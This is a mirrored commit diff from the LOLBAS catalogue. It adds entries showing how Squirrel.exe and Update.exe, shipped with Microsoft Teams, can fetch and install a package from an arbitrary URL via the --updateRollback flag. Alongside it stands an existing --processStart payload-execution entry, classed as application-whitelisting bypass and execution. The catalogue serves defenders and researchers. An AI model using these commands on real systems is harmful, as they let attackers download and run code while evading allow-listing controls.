mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Updated update and squirrel with updaterollback parameter
This commit is contained in:
parent
8fcc9a105a
commit
5b63815c0a
@ -28,6 +28,22 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: squirrel.exe --updateRoolback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: squirrel.exe --updateRollback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
|
- Path: '%localappdata%\Microsoft\Teams\current\Squirrel.exe'
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
@ -39,6 +55,7 @@ Resources:
|
|||||||
- Link: https://twitter.com/reegun21/status/1144182772623269889
|
- Link: https://twitter.com/reegun21/status/1144182772623269889
|
||||||
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
||||||
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
||||||
|
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Reegun J (OCBC Bank)
|
- Person: Reegun J (OCBC Bank)
|
||||||
Handle: '@reegun21'
|
Handle: '@reegun21'
|
||||||
|
@ -28,6 +28,22 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRoolback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: AWL Bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
|
Usecase: Download and execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Application Whitelisting Bypass
|
Usecase: Application Whitelisting Bypass
|
||||||
@ -56,6 +72,7 @@ Resources:
|
|||||||
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
||||||
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
|
||||||
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
|
||||||
|
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Reegun J (OCBC Bank)
|
- Person: Reegun J (OCBC Bank)
|
||||||
Handle: '@reegun21'
|
Handle: '@reegun21'
|
||||||
|
Loading…
Reference in New Issue
Block a user